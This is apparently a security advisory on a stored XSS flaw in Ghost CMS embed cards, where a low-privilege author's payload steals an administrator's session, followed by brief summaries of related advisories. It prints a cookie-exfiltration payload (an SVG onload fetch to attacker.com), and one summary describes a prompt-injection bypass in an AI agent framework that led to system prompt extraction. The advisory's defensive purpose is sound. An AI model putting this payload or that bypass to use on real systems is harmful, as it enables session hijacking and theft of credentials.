Oct 7, 2026·6 min read·7 visits
A vulnerability in Ghost CMS's Lexical-based editor allows low-privileged staff members to inject malicious script payloads via embed cards. When an administrator views the post in the editor, the script executes on the same origin as the administrative panel, enabling full session hijacking. The issue is resolved in version 6.67.0 by isolating embed previews under a separate origin.
Stored Cross-Site Scripting (XSS) and origin isolation bypass vulnerability in Ghost CMS versions 6.34.0 through 6.66.1 allows low-privileged staff users to execute arbitrary JavaScript in the context of an administrator session via crafted embed cards.
Ghost is a widely deployed open-source content management system built on Node.js. The application exposes an administrative control panel typically hosted at the /ghost/ URI path. This administrative interface handles content creation, user management, and system configuration.
From version 6.34.0, the administrative editing canvas transitioned to a rich text framework based on Lexical, packaged as @tryghost/koenig-lexical. This framework implements dynamic components called 'Embed Cards' to render live previews of external rich media services such as YouTube, Twitter, and other oEmbed providers. These cards are rendered directly inside the active editing canvas when a staff user creates or modifies a post draft.
A design flaw exists in the rendering logic of these embed cards. The application fails to isolate the execution context of the generated card preview from the main administrative interface origin. This exposes an attack surface where low-privileged users can inject persistent, malicious script payloads that execute in the browser of high-privileged administrative users.
The core of the vulnerability involves a combination of Stored XSS (CWE-79) and Improper Isolation (CWE-653). The Koenig editor framework displays interactive media previews directly inside the post creation panel. The system relies on retrieving stored oEmbed metadata from the database and loading it into the document object model.
A prior advisory, tracking under GHSA-8vhf-xxpj-4qrg, introduced text-based input filtering to strip executable scripts. However, modifications introduced in version 6.34.0 disrupted this validation sequence. Attackers bypass these string filters by embedding malicious JavaScript within nested SVG elements, malformed iframe targets, or non-standard protocols.
The fundamental flaw is the shared origin execution space. Because the rendering iframe resides on the administrative panel's domain, the browser permits it to bypass standard document boundaries. The script executes directly in the victim's active session, utilizing the administrative origin to bypass access controls.
The vulnerability was resolved in Ghost version 6.67.0. The remediation is architectural and shifts from input-based sanitization to strict origin isolation. Rather than filtering dangerous elements, the patch introduces a configuration setting that forces the rendering engine to load previews from a separate, isolated domain.
In the official patch commit 4cb7e7956356a47e2c2c240588ef32ecd9fddeaa, the development team updated dependencies to version 1.11.0 of @tryghost/koenig-lexical. This update introduces the embedPreviewUrl configuration parameter. The following code diff highlights the administrative interface package upgrade:
// apps/ember-admin/package.json
@@ -1,6 +1,6 @@
{
"name": "ghost-admin",
- "version": "6.66.1-rc.0",
+ "version": "6.67.0",
"description": "Ember.js admin client for Ghost",
"author": "Ghost Foundation",
"homepage": "http://ghost.org"By passing a distinct URL to the editor via security.embedPreviewUrl, the application structures the preview rendering to occur on a sandboxed origin. Because the sandboxed origin is distinct from the primary administrative panel domain, the browser's Same-Origin Policy restricts the frame from interacting with the parent administrative context. Even if a script successfully bypasses sanitization and executes within the preview, it remains trapped inside the isolated origin and cannot access administrative data, session cookies, or the parent document API.
To execute this exploit, an attacker must have an active staff account on the target Ghost CMS instance, such as a 'Contributor' or 'Author' role. These roles do not possess administrative permissions but have authorization to create and edit post drafts. The attack is highly targeted and does not require external network exposure of internal interfaces.
The attacker starts by creating a new post draft. Using the Ghost editor interface, the attacker inserts a custom embed block or directly manipulates the post payload schema to include a malicious oEmbed structure. The payload contains standard XSS vectors hidden within attributes or structures that bypass simple text filters, such as an SVG element containing an executable script block:
<svg onload="fetch('https://attacker.com/log?c=' + document.cookie)"></svg>Once the draft is saved, the stored payload remains passive in the database. The exploitation occurs when an administrator or editor reviews the pending drafts. When the victim opens the post in the Koenig editor, the application parses the schema, initializes the @tryghost/koenig-lexical editor component, and loads the embedded content in the same-origin frame. The script triggers immediately, sending the administrator's active session identifiers and CSRF tokens to the attacker's server, enabling full session takeover.
The impact of CVE-2026-105643 is classified as High, with a CVSS v3.1 base score of 7.3. Because the vulnerability requires a low-privileged authenticated account and user interaction, the overall severity is slightly mitigated in generalized scoring metrics. However, in targeted scenarios, the impact is equivalent to an unauthenticated remote compromise.
A successful exploit grants the attacker the exact privilege level of the victim who viewed the post. If an administrator views the post, the injected script gains complete access to the Ghost administrative REST API. This allows the script to perform administrative actions, including adding new administrator users, altering system configurations, modifying publication themes, and injecting persistent malware into public-facing pages.
The confidentiality and integrity impacts are rated as High. The script can retrieve database configurations, API keys for third-party integrations, and user lists. Because the script executes in the administrative context, there is no direct impact on system availability, meaning the host server continues to run normally, often hiding the active compromise from administrators.
The primary remediation strategy is upgrading the Ghost installation to version 6.67.0 or higher immediately. This update enforces origin isolation for all embed card previews. Administrators must verify that the security.embedPreviewUrl setting is configured to use a sandboxed origin and is not modified to point back to the main domain.
For environments where immediate patching is not feasible, security administrators can run a database query to search for stored malicious scripts in active draft post schemas. The following SQL query searches for scripts, inline event handlers, or pseudo-protocols within the posts table:
SELECT id, uuid, title, status
FROM posts
WHERE (mobiledoc LIKE '%<script%' OR lexical LIKE '%<script%')
OR (lexical LIKE '%javascript:%' OR lexical LIKE '%onload%');Organizations should also audit user roles and demote unnecessary staff accounts. Restricting authoring permissions minimizes the overall attack surface by limiting the number of users capable of inserting embed elements into the publication database. Implementing egress network monitoring for administrative systems helps identify unauthorized API calls and credential exfiltration.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
Ghost TryGhost | >= 6.34.0, < 6.67.0 | 6.67.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-79, CWE-653 |
| Attack Vector | Network |
| CVSS Score | 7.3 |
| EPSS Score | 0.00271 |
| Impact | High (Complete Session Compromise) |
| Exploit Status | None (No public PoC) |
| KEV Status | Not Listed |
The application fails to fully sanitize input parameters inside embed cards, allowing user-supplied HTML and JavaScript payloads to persist in the database and render to administrative users.
CVE-2026-105645 is a regular expression denial of service (ReDoS) vulnerability affecting Ghost, an open-source Node.js content management system. The vulnerability exists within directory import handlers and the external media inliner, allowing authenticated administrators to trigger catastrophic backtracking in the V8 JavaScript engine, resulting in infinite loops, 100% CPU utilization, and total denial of service.
A Stored Cross-Site Scripting (XSS) and Unrestricted Upload of File with Dangerous Type vulnerability in Ghost CMS (versions 4.0.0 to 6.66.x) allows remote attackers to execute arbitrary JavaScript in the context of an administrator's session. The flaw lies in the content import subsystem, which extracted and stored SVG files without sanitization or binary verification.
CVE-2026-105642 is a critical remote code execution vulnerability in Ghost CMS, affecting versions 6.56.0 through 6.66.0. The flaw resides in how Ghost's backend handles external image metadata when generating 'Bookmark' cards in the post editor. When a low-privileged staff member inputs a malicious URL, the server fetches and processes an SVG containing an embedded payload, leading to command execution via the underlying, vulnerable image-processing component.
This report provides a comprehensive technical analysis of CVE-2026-61439 (GHSA-fj8f-m44g-c479), a prompt injection defense bypass vulnerability in the PraisonAI multi-agent framework. In versions prior to 4.6.78, the InjectionDefense scanner threshold defaulted to CRITICAL. This allowed single-vector prompt injections classified as HIGH severity (e.g., direct instruction overrides or financial manipulations) to pass through unblocked, enabling attackers to extract system prompts and execute unauthorized agent tools.
Kunstmaan CMS MediaBundle prior to version 7.3.2 contains a critical file upload vulnerability where case-sensitive extension checks can be bypassed using mixed-case file extensions. Because extension normalization occurs after the validation routine, files with mixed-case executable extensions (such as pHp) bypass checks but are stored with normalized lowercase executable extensions, allowing authenticated administrators to achieve remote code execution.
A critical remote code execution vulnerability was identified in WeasyPrint prior to version 70.0. When compiling HTML containing a malicious Encapsulated PostScript (EPS) graphic on a host with Ghostscript installed, Pillow invokes Ghostscript to process the image, executing arbitrary PostScript commands.